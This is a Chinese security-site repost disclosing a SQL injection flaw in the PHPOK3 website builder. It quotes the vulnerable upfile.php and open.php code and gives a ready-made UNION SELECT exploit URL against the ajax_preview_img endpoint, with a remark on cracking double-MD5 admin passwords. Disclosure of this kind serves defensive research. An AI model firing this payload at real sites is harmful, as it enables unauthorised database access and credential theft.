【漏洞】PHPOK3 企业网站建站程序注入

admin
admin
admin
140350
文章
117
评论
2021年4月3日18:53:33评论59 views字数 1093阅读3分38秒阅读模式

作者:jsbug

网站:http://hi.baidu.com/jsbug/

    朋友总是踩着俺的尸体踏上DOTA的超神之路,看到论坛有人说phpok,趁着周末,送上人头一枚,希望你也能超神。

“phpok3/app/www/models/upfile.php”:

//通过ID串获取图片信息,这里获取的带有ID的缩略图
function piclist($idstring="")
{
    if(!$idstring)
    {
        return false;
    }
    $sql = "SELECT id,thumb url FROM ".$this->db->prefix."upfiles WHERE id IN(".$idstring.") ORDER BY substring_index('".$idstring."',id,1)";
    echo($sql);
    return $this->db->get_all($sql);
}

    IN() 这里的问题,有点类似当年的“Dz5.0”“pm.php”漏洞。

“phpok3/app/www/control/open.php”:

//通过Ajax预览图片
function ajax_preview_img_f()
{
//这里只是为了防止跨站,并且过滤的不好
    $idstring = $this->trans_lib->safe("idstring");
    if(!$idstring)
    {
        exit("empty");
    }
//直接代入
    $rslist = $this->upfile_m->piclist($idstring);
    sys_html2js($this->json_lib->encode($rslist));
}

    有几个同类型的就不再赘述了。

附 Exp:

http://localhost/phpok3/index.php?c=open&f=ajax_preview_img&idstring=0) union select 1,version()%23

官方图:

    密码两次 MD5,当然你也可以直接跑 Session (没测试,我随口一说)。

文章来源于lcx.cc:【漏洞】PHPOK3 企业网站建站程序注入

相关推荐: 科普:网上流畅一个种说法,只要有身份证就能办信用卡?套取用户信息?

网上流畅一个种说法,求见多识广大牛科普 clzzy (南无阿弥陀佛) | 2014-03-31 16:28 某日,某QQ头像闪动,打开一看,是一则广告,大概意思是:只要有身份证就能办信用卡。 求指教,这可能么?本人也是信用卡用户,办卡流程都是:提交资料--总行…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:53:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞】PHPOK3 企业网站建站程序注入https://cn-sec.com/archives/319068.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息